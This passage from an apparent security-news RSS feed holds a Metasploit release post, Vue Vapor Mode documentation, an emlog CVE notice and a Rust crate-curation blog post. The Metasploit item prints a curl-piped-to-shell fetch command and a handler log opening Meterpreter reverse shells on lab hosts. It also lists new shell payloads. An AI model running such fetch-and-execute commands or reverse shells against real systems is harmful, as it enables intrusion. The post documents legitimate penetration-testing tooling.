<span class="pl-en">createApp</span><span class="pl-kos">(</span><span class="pl-v">App</span><span class="pl-kos">)</span><span class="pl-kos">.</span><span class="pl-en">use</span><span class="pl-kos">(</span><span class="pl-s1">vaporInteropPlugin</span><span class="pl-kos">)</span><span class="pl-kos">.</span><span class="pl-en">mount</span><span class="pl-kos">(</span><span class="pl-s">'#app'</span><span class="pl-kos">)</span></pre></div>
<p>A Vapor app instance can also install <code>vaporInteropPlugin</code> to allow VDOM components to be used inside, but this pulls in the VDOM runtime and offsets the benefits of a smaller bundle.</p>
<p>Components authored with render functions or JSX remain VDOM components and also require interop when used in a Vapor application.</p>
<p>When the interop plugin is installed, Vapor and non-Vapor components can be nested inside each other. This currently covers standard props, events, and slots usage, but does not yet account for all possible edge cases. For example, there may still be rough edges when using a VDOM-based component library in Vapor Mode.</p>
<p>In general, we recommend having distinct regions in an app where one rendering mode or the other is used, and avoiding mixed nesting as much as possible.</p>
<h2>Feature Compatibility</h2>
<p>By design, Vapor Mode supports a subset of existing Vue features. For the supported subset, we aim to deliver the same behavior according to the API specifications. The following features are currently unsupported or do not apply to Vapor Mode:</p>
<ul>
<li>Options API</li>
<li><code>app.config.globalProperties</code></li>
<li><code>getCurrentInstance()</code> returns <code>null</code> in Vapor components</li>
<li><code>@vue:xxx</code> per-element lifecycle events</li>
<li><code>v-memo</code></li>
<li>Component template refs do not expose properties such as <code>$el</code>, <code>$props</code>, <code>$attrs</code>, <code>$slots</code>, and <code>$refs</code></li>
</ul>
<h2>Important Usage Considerations</h2>
<h3>Event Delegation and <code>stopPropagation()</code></h3>
<p>Vapor delegates eligible events to <code>document</code>. Each element stores its own handler, and a single document listener walks the event path and invokes matching handlers.</p>
<p>If any ancestor calls <code>stopPropagation()</code>, the event never reaches <code>document</code>, and the delegated handler will not run.</p>
<p>The following forms bypass delegation and attach the listener directly to the element:</p>
<div class="highlight highlight-text-html-vue notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content='&lt;button @[event]="onClick" /&gt;
&lt;button v-bind="{ onClick }" /&gt;
&lt;button v-on="{ click: onClick }" /&gt;'><pre>&lt;<span class="pl-ent">button</span> @[<span class="pl-s1"><span class="pl-c1">event</span></span>]=<span class="pl-pds">"</span><span class="pl-s1"><span class="pl-smi">onClick</span></span><span class="pl-pds">"</span> /&gt;
&lt;<span class="pl-ent">button</span> <span class="pl-e">v-bind</span>=<span class="pl-pds">"</span><span class="pl-s1">{ <span class="pl-smi">onClick</span> }</span><span class="pl-pds">"</span> /&gt;
&lt;<span class="pl-ent">button</span> <span class="pl-e">v-on</span>=<span class="pl-pds">"</span><span class="pl-s1">{ click: <span class="pl-smi">onClick</span> }</span><span class="pl-pds">"</span> /&gt;</pre></div>
<h3><code>slots.default()</code> Is Not a Safe Dry Run</h3>
<p>In Vapor, <code>slots.default()</code> is not a side-effect-free inspection API. Calling it executes the slot's rendering logic, which may create Blocks and DOM nodes, register reactive effects, and claim existing SSR DOM during hydration.</p>
<p>Do not call a slot to inspect its output before deciding what else to render:</p>
<div class="highlight highlight-text-html-vue notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="&lt;script setup vapor&gt;
import { useSlots } from 'vue'

const slots = useSlots()
const content = slots.default?.()
const showFallback = !content
&lt;/script&gt;

&lt;template&gt;
  &lt;div v-if=&quot;showFallback&quot;&gt;Fallback&lt;/div&gt;
&lt;/template&gt;"><pre>&lt;<span class="pl-ent">script</span> setup vapor&gt;<span class="pl-s1"></span>
<span class="pl-s1"><span class="pl-k">import</span> { <span class="pl-smi">useSlots</span> } <span class="pl-k">from</span> <span class="pl-s"><span class="pl-pds">'</span>vue<span class="pl-pds">'</span></span></span>
<span class="pl-s1"></span>
<span class="pl-s1"><span class="pl-k">const</span> <span class="pl-c1">slots</span> <span class="pl-k">=</span> <span class="pl-en">useSlots</span>()</span>
<span class="pl-s1"><span class="pl-k">const</span> <span class="pl-c1">content</span> <span class="pl-k">=</span> <span class="pl-smi">slots</span>.<span class="pl-smi">default</span><span class="pl-k">?</span>.()</span>
<span class="pl-s1"><span class="pl-k">const</span> <span class="pl-c1">showFallback</span> <span class="pl-k">=</span> <span class="pl-k">!</span>content</span>
<span class="pl-s1"><span class="pl-k">&lt;</span><span class="pl-k">/</span>script<span class="pl-k">&gt;</span></span>
<span class="pl-s1"></span>
<span class="pl-s1"><span class="pl-k">&lt;</span>template<span class="pl-k">&gt;</span></span>
<span class="pl-s1">  <span class="pl-k">&lt;</span>div v<span class="pl-k">-</span><span class="pl-k">if</span><span class="pl-k">=</span><span class="pl-s"><span class="pl-pds">"</span>showFallback<span class="pl-pds">"</span></span><span class="pl-k">&gt;</span>Fallback<span class="pl-k">&lt;</span><span class="pl-k">/</span>div<span class="pl-k">&gt;</span></span>
<span class="pl-s1"><span class="pl-k">&lt;</span><span class="pl-k">/</span>template<span class="pl-k">&gt;</span></span></pre></div>
<p>Instead, leave slot rendering to the template:</p>
<div class="highlight highlight-text-html-vue notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="&lt;template&gt;
  &lt;slot /&gt;
&lt;/template&gt;"><pre>&lt;<span class="pl-ent">template</span>&gt;
  &lt;<span class="pl-ent">slot</span> /&gt;
&lt;/<span class="pl-ent">template</span>&gt;</pre></div>
<h3>Custom Directives Use a Different Interface</h3>
<p>Custom directives in Vapor also have a different interface:</p>
<div class="highlight highlight-source-ts notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="type VaporDirective = (
  node: Element | VaporComponentInstance,
  value?: () =&gt; any,
  argument?: string,
  modifiers?: DirectiveModifiers,
) =&gt; (() =&gt; void) | void"><pre><span class="pl-k">type</span> <span class="pl-smi">VaporDirective</span> <span class="pl-c1">=</span> <span class="pl-kos">(</span>
  <span class="pl-s1">node</span>: <span class="pl-smi">Element</span> <span class="pl-c1">|</span> <span class="pl-smi">VaporComponentInstance</span><span class="pl-kos">,</span>
  <span class="pl-s1">value</span>?: <span class="pl-kos">(</span><span class="pl-kos">)</span> <span class="pl-c1">=&gt;</span> <span class="pl-smi">any</span><span class="pl-kos">,</span>
  <span class="pl-s1">argument</span>?: <span class="pl-smi">string</span><span class="pl-kos">,</span>
  <span class="pl-s1">modifiers</span>?: <span class="pl-smi">DirectiveModifiers</span><span class="pl-kos">,</span>
<span class="pl-kos">)</span> <span class="pl-c1">=&gt;</span> <span class="pl-kos">(</span><span class="pl-kos">(</span><span class="pl-kos">)</span> <span class="pl-c1">=&gt;</span> <span class="pl-smi"><span class="pl-k">void</span></span><span class="pl-kos">)</span> <span class="pl-c1">|</span> <span class="pl-smi"><span class="pl-k">void</span></span></pre></div>
<p><code>value</code> is a reactive getter that returns the binding value. Reactive effects can be set up using <code>watchEffect()</code> and are automatically released when the component unmounts. A directive may also return a cleanup function:</p>
<div class="highlight highlight-source-ts notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="const MyDirective = (el, source) =&gt; {
  watchEffect(() =&gt; {
    el.textContent = source()
  })
  return () =&gt; console.log('cleanup')
}"><pre><span class="pl-k">const</span> <span class="pl-v">MyDirective</span> <span class="pl-c1">=</span> <span class="pl-kos">(</span><span class="pl-s1">el</span><span class="pl-kos">,</span> <span class="pl-s1">source</span><span class="pl-kos">)</span> <span class="pl-c1">=&gt;</span> <span class="pl-kos">{</span>
  <span class="pl-en">watchEffect</span><span class="pl-kos">(</span><span class="pl-kos">(</span><span class="pl-kos">)</span> <span class="pl-c1">=&gt;</span> <span class="pl-kos">{</span>
    <span class="pl-s1">el</span><span class="pl-kos">.</span><span class="pl-c1">textContent</span> <span class="pl-c1">=</span> <span class="pl-en">source</span><span class="pl-kos">(</span><span class="pl-kos">)</span>
  <span class="pl-kos">}</span><span class="pl-kos">)</span>
  <span class="pl-k">return</span> <span class="pl-kos">(</span><span class="pl-kos">)</span> <span class="pl-c1">=&gt;</span> <span class="pl-smi">console</span><span class="pl-kos">.</span><span class="pl-en">log</span><span class="pl-kos">(</span><span class="pl-s">'cleanup'</span><span class="pl-kos">)</span>
<span class="pl-kos">}</span></pre></div>
<h2>Behavior Consistency</h2>
<p>Vapor Mode attempts to match VDOM Mode behavior as much as possible, but minor inconsistencies may still exist in edge cases because the two rendering modes are fundamentally different. In general, a minor inconsistency is not considered a breaking change unless the behavior has previously been documented.</p>
<p>For stable releases, please refer to <a href="https://github.com/vuejs/core/blob/main/CHANGELOG.md">CHANGELOG.md</a> for details.<br>
For pre-releases, please refer to <a href="https://github.com/vuejs/core/blob/minor/CHANGELOG.md">CHANGELOG.md</a> of the <code>minor</code> branch.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap Up: An HTTP to SMB relay plus Payload Improvements]]></title>
<description><![CDATA[Metasploit Wrap Up HousekeepingWhile the Metasploit Framework will be continuing its weekly release cadence, bringing you dear reader our latest content, the Weekly Wrap Up is being shifted to a bi-weekly cadence. The team is planning to use the additional time between posts to record demos of so...]]></description>
<link>https://tsecurity.de/de/3676924/it-security-nachrichten/metasploit-wrap-up-an-http-to-smb-relay-plus-payload-improvements/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676924/it-security-nachrichten/metasploit-wrap-up-an-http-to-smb-relay-plus-payload-improvements/</guid>
<pubDate>Fri, 17 Jul 2026 21:52:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Metasploit Wrap Up Housekeeping</h2><p>While the Metasploit Framework will be continuing its weekly release cadence, bringing you dear reader our latest content, the Weekly Wrap Up is being shifted to a bi-weekly cadence. The team is planning to use the additional time between posts to record demos of some of the more exciting content. Stay tuned for the next generation of Metasploit Wrap Ups and be sure to subscribe to the <a href="https://www.rapid7.com/blog/tag/metasploit/rss/">RSS Feed</a> to be alerted when new blogs are released.</p><h2>Fetch Multi: Just Fetch and Forget?</h2><p>Our very own <a href="https://github.com/bwatters-r7">bwatters-r7</a> continued to enhance our Fetch Payloads implementation. This time adding a new Linux Fetch Multi payload family that supports on-the-fly Linux architecture identification. Standard Fetch payloads produce a command that will download and execute a specific binary payload on a target, but the new Linux Fetch Multi family will report the architecture of the target host when it requests the payload, and the handler will automatically serve the correct elf architecture payload for the given target. It means that if a user is exploiting a Linux host, they do not need to guess the target’s architecture when selecting a payload. It also means that one payload and one handler can serve across multiple targets of differing architectures. Since these payloads work by adding a query string, only HTTP and HTTPS-based fetch payloads support Fetch Multi payloads.</p><p>Here is an example of the same payload and handler identifying and delivering the proper elf architecture payloads to a mipsel host, a mips64 host, and an aarch64 host by just executing the command <span data-type="inlineCode">curl -s http://10.5.135.210:8080/x|sh</span> on each target.</p><p></p><pre>msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) &gt; show options
Module options (payload/cmd/linux/http/multi/meterpreter_reverse_tcp):
   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, GET, TFTP, TNFTP,
                                               WGET)
   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous
                                              handles, requires Linux ≥3.17 (for Python variant also Python ≥3
                                              .8, tested shells are sh, bash, zsh) (Accepted: none, python3.8+
                                              , shell-search, shell)
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
   FETCH_URIPATH   x                no        Local URI to use for serving payload
   LHOST           10.5.135.210     yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port
   When FETCH_COMMAND is one of CURL,GET,WGET:
   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  true             yes       Host both the binary payload and the command so it can be piped dire
                                          ctly to the shell.
   When FETCH_FILELESS is none:
   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      cldOGvRDplZ      no        Name to use on remote system when storing payload; cannot co
                                                  ntain spaces or slashes
   FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces
View the full module info with the info, or info -d command.
msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) &gt; to_handler
[*] Command to execute on target: curl -s http://10.5.135.210:8080/x|sh
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 10.5.135.210:8080
[*] HTTP server started
[*] Adding resource /csmCra8lnQTHxFXkipQC0w
[*] Adding resource /x
[*] Started reverse TCP handler on 10.5.135.210:4444 
msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) &gt; [*] Client 10.5.132.212 requested /x
[*] Sending payload to 10.5.132.212 (curl/8.13.0-rc3)
[*] Client 10.5.132.212 requested /csmCra8lnQTHxFXkipQC0w?arch=armv7l
[*] Sending payload to 10.5.132.212 (curl/8.13.0-rc3)
[*] Dynamic Payload Detected, expecting a Query String in the request...
[*] Building payload for armle arch
[*] Meterpreter session 1 opened (10.5.135.210:4444 -&gt; 10.5.132.212:45068) at 2026-07-14 11:33:18 -0500
[*] Client 10.5.132.214 requested /x
[*] Sending payload to 10.5.132.214 (curl/8.11.0)
[*] Client 10.5.132.214 requested /csmCra8lnQTHxFXkipQC0w?arch=aarch64
[*] Sending payload to 10.5.132.214 (curl/8.11.0)
[*] Dynamic Payload Detected, expecting a Query String in the request...
[*] Building payload for aarch64 arch
[*] Meterpreter session 2 opened (10.5.135.210:4444 -&gt; 10.5.132.214:39894) at 2026-07-14 11:33:26 -0500
[*] Client 10.5.132.224 requested /x
[*] Sending payload to 10.5.132.224 (curl/7.52.1)
[*] Client 10.5.132.224 requested /csmCra8lnQTHxFXkipQC0w?arch=mips64
[*] Sending payload to 10.5.132.224 (curl/7.52.1)
[*] Dynamic Payload Detected, expecting a Query String in the request...
[*] Building payload for mips64 arch
[*] Meterpreter session 3 opened (10.5.135.210:4444 -&gt; 10.5.132.224:53506) at 2026-07-14 11:33:41 -0500
msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) &gt; sessions -C sysinfo
[*] Running 'sysinfo' on meterpreter session 1 (10.5.132.212)
Computer     : kali-raspberrypi
OS           : Debian  (Linux 5.15.44-Re4son-v7+)
Architecture : armv7l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : cmd/linux
[*] Running 'sysinfo' on meterpreter session 2 (10.5.132.214)
Computer     : kali-raspberrypi
OS           : Debian  (Linux 5.15.44-Re4son-v8l+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : cmd/linux
[*] Running 'sysinfo' on meterpreter session 3 (10.5.132.224)
Computer     : ubnt
OS           : Debian 9.13 (Linux 4.9.79-UBNT)
Architecture : mips64
BuildTuple   : mips64-linux-muslsf
Meterpreter  : cmd/linux
msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) &gt;</pre><h2>RISC architecture is going to change everything!</h2><p>Speaking of juggling multiple architectures, <a href="https://github.com/bcoles">bcoles</a> added support for yet another IoT arch: RiscV. The change adds staged and stageless shell payloads for both 32- and 64-bit RiscV systems, and dovetails well with his other PR adding XOR encoders for RiscV payloads.</p><h2>New module content (4)</h2><h3>Microsoft Windows HTTP to SMB Relay</h3><p>Author: jheysel-r7</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21620">#21620</a> contributed by <a href="https://github.com/jheysel-r7">jheysel-r7</a></p><p>Path: server/relay/http_to_smb</p><p>Description: Adds an HTTP to SMB Relay server module allowing users to relay an incoming NTLM HTTP authentication request to multiple SMB servers in order to establish SMB session on the target hosts to be used by the framework.</p><h3>Byte XORi Encoder</h3><p>Author: bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a></p><p>Type: Encoder</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21235">#21235</a> contributed by <a href="https://github.com/bcoles">bcoles</a></p><p>Path: riscv32le/byte_xori</p><p>Description: Add four encoder variants for both RISC-V 32-bit and 64-bit little-endian architectures.</p><h3>FTP, HTTP, HTTPS and METERPRETER_REVERSE_TCP Fetch, Linux Chmod</h3><p>Authors: Brendan Watters, Spencer McIntyre, and bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a></p><p>Type: Payload (Adapter)</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21384">#21384</a> contributed by <a href="https://github.com/bwatters-r7">bwatters-r7</a></p><p>Description: Adds Linux fetch multi payloads, a fetch server for FTP-based fetch payloads, a TFTP server to rex/proto to align with our other servers.</p><p>This adapter adds 421 new payloads for all Linux and Windows architectures including:</p><ul><li>cmd/linux/ftp/aarch64/chmod</li><li>cmd/linux/ftp/x86/meterpreter/reverse_tcp</li><li>cmd/windows/ftp/aarch64/meterpreter_reverse_http</li></ul><h3>FTP Fetch, Linux dup2 Command Shell, Bind TCP Stager</h3><p>Authors: Brendan Watters, Spencer McIntyre, and bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a></p><p>Type: Payload (Stager)</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21237">#21237</a> contributed by <a href="https://github.com/bcoles">bcoles</a></p><p>Description: Adds reverse_tcp and bind_tcp stagers and a shell command stage for both RISC-V 64-bit and 32-bit little-endian Linux targets.</p><ul><li>cmd/linux/ftp/riscv32le/shell/bind_tcp</li><li>cmd/linux/http/riscv32le/shell/bind_tcp</li><li>cmd/linux/https/riscv32le/shell/bind_tcp</li><li>cmd/linux/tftp/riscv32le/shell/bind_tcp</li><li>linux/riscv32le/shell/bind_tcp</li><li>cmd/linux/ftp/riscv32le/shell/reverse_tcp</li><li>cmd/linux/http/riscv32le/shell/reverse_tcp</li><li>cmd/linux/https/riscv32le/shell/reverse_tcp</li><li>cmd/linux/tftp/riscv32le/shell/reverse_tcp</li><li>linux/riscv32le/shell/reverse_tcp</li><li>cmd/linux/ftp/riscv64le/shell/bind_tcp</li><li>cmd/linux/http/riscv64le/shell/bind_tcp</li><li>cmd/linux/https/riscv64le/shell/bind_tcp</li><li>cmd/linux/tftp/riscv64le/shell/bind_tcp</li><li>linux/riscv64le/shell/bind_tcp</li><li>cmd/linux/ftp/riscv64le/shell/reverse_tcp</li><li>cmd/linux/http/riscv64le/shell/reverse_tcp</li><li>cmd/linux/https/riscv64le/shell/reverse_tcp</li><li>cmd/linux/tftp/riscv64le/shell/reverse_tcp</li><li>linux/riscv64le/shell/reverse_tcp</li></ul><h2>Enhancements and features (4)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21235">#21235</a> from <a href="https://github.com/bcoles">bcoles</a> - Add four encoder variants for both RISC-V 32-bit and 64-bit little-endian architectures.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21384">#21384</a> from <a href="https://github.com/bwatters-r7">bwatters-r7</a> - Adds Linux fetch multi payloads, a fetch server for FTP-based fetch payloads, a TFTP server to rex/proto to align with our other servers.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21599">#21599</a> from <a href="https://github.com/Pushpenderrathore">Pushpenderrathore</a> - This extends CertificateTrace functionality to also surface the server's TLS peer certificate when an HTTP module connects over HTTPS. This makes use of the same CertificateTrace enum (off/metadata/full) operators are already familiar with.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21602">#21602</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Updates the Windows service PE template to use an injected segment instead of the old substitution method.</li></ul><h2>Bugs fixed (4)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21621">#21621</a> from <a href="https://github.com/eipoverflow">eipoverflow</a> - This fix a limitation on running fileless staged Meterpreter in recent OSX versions.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21670">#21670</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Marks the dynamic XOR encoders as unable to preserve registers and adds regression coverage for stage encoding when a preserved register is required.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21675">#21675</a> from <a href="https://github.com/sjanusz-r7">sjanusz-r7</a> - Fix search_cache job cache generation by skipping multi arch payloads.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21677">#21677</a> from <a href="https://github.com/bwatters-r7">bwatters-r7</a> - Fixes a bug in the HTTP relay server mixin where requests matching the module's URIPATH were silently dropped instead of being relayed The fix removes the now-unnecessary URIPATH option, ensures all requests are properly relayed, and adds spec tests to cover the fix.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-07-08T13%3A32%3A18-07%3A00..2026-07-15T15%3A48%3A48-07%3A00%22">Pull Requests 6.4.143...6.4.144</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.143...6.4.144">Full diff 6.4.143...6.4.144</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-46687 | emlog up to 2.6.13 Article Publishing Interface api_controller.php getView template php file inclusion (EUVD-2026-44986)]]></title>
<description><![CDATA[A vulnerability was found in emlog up to 2.6.13. It has been declared as problematic. Affected by this vulnerability is the function getView of the file api_controller.php of the component Article Publishing Interface. Executing a manipulation of the argument template can lead to improper control...]]></description>
<link>https://tsecurity.de/de/3674559/sicherheitsluecken/cve-2026-46687-emlog-up-to-2613-article-publishing-interface-apicontrollerphp-getview-template-php-file-inclusion-euvd-2026-44986/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674559/sicherheitsluecken/cve-2026-46687-emlog-up-to-2613-article-publishing-interface-apicontrollerphp-getview-template-php-file-inclusion-euvd-2026-44986/</guid>
<pubDate>Thu, 16 Jul 2026 22:06:03 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/emlog">emlog up to 2.6.13</a>. It has been declared as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected by this vulnerability is the function <code>getView</code> of the file <em>api_controller.php</em> of the component <em>Article Publishing Interface</em>. Executing a manipulation of the argument <em>template</em> can lead to improper control of filename for include/require statement in php program.

This vulnerability appears as <a href="https://vuldb.com/cve/CVE-2026-46687">CVE-2026-46687</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[Niko Matsakis: Battery packs: Let's talk about crates, baby]]></title>
<description><![CDATA[This blog post describes an idea I’ve been kicking around called battery packs. Battery packs are a curated set of crates arranged around a common theme. For example, there’s a CLI battery pack that has everything you need to build a great CLI, an opinionated pack for creating a backend web servi...]]></description>
<link>https://tsecurity.de/de/3674266/tools/niko-matsakis-battery-packs-lets-talk-about-crates-baby/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674266/tools/niko-matsakis-battery-packs-lets-talk-about-crates-baby/</guid>
<pubDate>Thu, 16 Jul 2026 19:24:07 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img alt="Battery pack logo" class="float-right" src="https://smallcultfollowing.com/babysteps/%20/assets/2026-07-15-battery-packs.png">
<p>This blog post describes an idea I’ve been kicking around called <strong>battery packs</strong>. Battery packs are a curated set of crates arranged around a common theme. For example, there’s a CLI battery pack that has <a href="https://crates.io/crates/cli-battery-pack">everything you need to build a great CLI</a>, an opinionated pack for <a href="https://crates.io/crates/backend-service-battery-pack">creating a backend web service</a>, and <a href="https://crates.io/crates/embedded-battery-pack">one for embedded development</a> (based on the Embedded Working Group’s <a href="https://github.com/rust-embedded/awesome-embedded-rust">Awesome Rust repository</a>). We’ve also got some smaller ones, such as the <a href="https://crates.io/crates/error-battery-pack">error-handling battery pack</a> that shows how to handle errors in Rust. But this is just the beginning – a key part of the battery pack design is that anybody can create one.</p>
<p>Battery packs are meant to address one of the most common things I hear from new Rust adopters. Everyone loves the wealth of high-quality crates available on crates.io. And everyone hates having to spend a bunch of time researching and comparing alternatives. Battery packs can serve as a good set of default choices. And they don’t lock you in. At heart, they’re basically just a list of recommended crates, so you can always swap something out if you find an alternative.</p>

<p>We’ve got a prototype of the battery pack tool working today, so you can try it out if you’re curious. Just run <code>cargo install cargo-bp</code> and then try a few commands! For example,</p>
<div class="highlight"><pre class="chroma" tabindex="0"><code class="language-bash"><span class="line"><span class="cl">&gt; cargo bp list
</span></span></code></pre></div><p>will show you the set of available battery packs, based on a crates.io search (as I’ll explain below, a battery pack is itself packaged and distributed as a crate, but not one that you take a direct dependency on). And <code>cargo bp add</code> will add batteries from a battery pack into your crate, so e.g.</p>
<div class="highlight"><pre class="chroma" tabindex="0"><code class="language-bash"><span class="line"><span class="cl">&gt; cargo bp add cli
</span></span></code></pre></div><p>would let you select and add common CLI libraries. If you want to see a more involved demo, try out <code>cargo bp add embedded</code>, which is derived from the <a href="https://github.com/rust-embedded/awesome-embedded-rust">Awesome Embedded Rust</a> repository.</p>
<h3>Let’s talk about you and me</h3>
<p>One of the key ideas from battery packs is that <strong>anybody can publish one</strong>. They are just a crate named <code>X-battery-pack</code>; the dependencies of that crate are your recommendations. Features are designations of common sets of crates frequently used together. The examples are your templates. And so forth.</p>
<p>Letting anybody create a battery pack is in contrast to the previous ideas for an “extended standard library for Rust”<sup><a class="footnote-ref" href="https://smallcultfollowing.com/babysteps/atom.xml#fn:1">1</a></sup>, and it is intended to address some of Rust’s unique challenges. For one thing, it lets people publish battery packs that are tailored to specific requirements. For example, the <a href="https://crates.io/crates/cli-battery-pack">CLI</a> and <a href="https://crates.io/crates/backend-service-battery-pack">backend service</a> battery packs are targeting a “typical computer”. But I could imagine the <a href="https://rust-embedded.org/">Rust embedded working group</a> publishing a battery pack with libraries focused on no-std and binary size optimization.</p>
<p>Being open-ended also addresses the <em>“who decides?”</em> question. To my mind, the best people to recommend what libraries you ought to use are <strong>other people building systems like yours</strong>. This is why I mentioned the Embedded Working Group publishing an Embedded battery pack, for example, as I think they are clearly a set of people who know their space well. But even within the embedded space there are yet smaller groups, and I imagine that sometimes it’ll make sense to get narrower. For example, perhaps a battery pack targeted <a href="https://embassy.dev/">embassy</a> and its associated ecosystem? Unclear.</p>
<h4>Creating a battery pack</h4>
<p>If you wanted to create a battery pack, how do you do it? One answer is that you just create a new crate. But a better approach is to use the “battery-pack battery pack”<sup><a class="footnote-ref" href="https://smallcultfollowing.com/babysteps/atom.xml#fn:2">2</a></sup>, which bundles a template:</p>
<div class="highlight"><pre class="chroma" tabindex="0"><code class="language-bash"><span class="line"><span class="cl">cargo bp new battery-pack
</span></span></code></pre></div><p>This will prompt you for the name of the battery pack you want to create and a few other things and make your crate. Then you can just use <code>cargo add</code> dependencies to represent the libraries you want to recommend and publish.</p>
<h4>“Batteries” are more than dependencies</h4>
<p>The “batteries” that you can add to your project aren’t always dependencies. They can also be “recipes” or templates. For example, the CI battery pack<sup><a class="footnote-ref" href="https://smallcultfollowing.com/babysteps/atom.xml#fn:3">3</a></sup> can configure your project with the kind of “super neat-o” github actions you’ve always wanted but never wanted to bother configuring. To use it, select one or more of the templates to install:</p>
<div class="highlight"><pre class="chroma" tabindex="0"><code class="language-bash"><span class="line"><span class="cl">cargo bp add ci
</span></span></code></pre></div><p>I expect this kind of “actions to improve your crate” to become a rich source of things. Right now we’re using a relatively lightweight template system built on <a href="https://github.com/mitsuhiko/minijinja">minijinja</a>, but I think we’re going to want to expand on this.</p>
<h4>Giving it some structure</h4>
<p>Battery Packs also support more than just a flat listing of dependencies/features/templates. You can group dependencies and features into <em>categories</em> and then, for each category, distinguish between “pick at most one” or “pick any number”. For a fun example, try <code>cargo bp add embedded</code>, which is derived from the <a href="https://github.com/rust-embedded/awesome-embedded-rust">Awesome Embedded Rust</a> repository. If you run it, you’ll see something like this, which groups the choices thematically and, in some areas like “concurrency framework”, makes it clear that you want to pick one:</p>
<pre tabindex="0"><code>──────────────────────────────────────────────────────────────────
 ▼ Concurrency Framework (pick at most one)
 &gt; ○ ✦ embassy [embassy-executor, embassy-sync, embassy-time]
   ○ ✦ rtic [cortex-m, rtic]    RTIC — interrupt-driven real-time

 ▼ Display &amp; Graphics (pick any number)
   [ ] ✦ display-ssd1306 [embedded-graphics, ssd1306]    SSD1306
   [ ] ✦ display-st7789 [embedded-graphics, st7789]    ST7789 col

 ▼ Popular Drivers (pick any number)
   [ ] ✦ display-ssd1306 [embedded-graphics, ssd1306]    SSD1306
   [ ] ✦ display-st7789 [embedded-graphics, st7789]    ST7789 col
   [ ] ✦ sensor-bme280 [bme280]    BME280 temperature/humidity/pr
   [ ] ✦ sensor-lis3dh [lis3dh]    LIS3DH 3-axis accelerometer (I
   [ ] ✦ usb-device [usb-device, usbd-serial]    USB device stack

 ▼ Hardware Abstraction Layer (pick at most one)
   ○ ✦ atsamd [atsamd-hal, cortex-m-rt, critical-section-impl, co
   ○ ✦ esp32 [embedded-hal, esp-hal]    ESP32 (Xtensa, WiFi + BT,
   ○ ✦ esp32c3 [embedded-hal, esp-hal]    ESP32-C3 (RISC-V, WiFi
   ○ ✦ esp32s3 [embedded-hal, esp-hal]    ESP32-S3 (Xtensa, WiFi
   ○ ✦ nrf52832 [cortex-m-rt, critical-section-impl, cortex-m, em
   ○ ✦ nrf52840 [cortex-m-rt, critical-section-impl, cortex-m, em
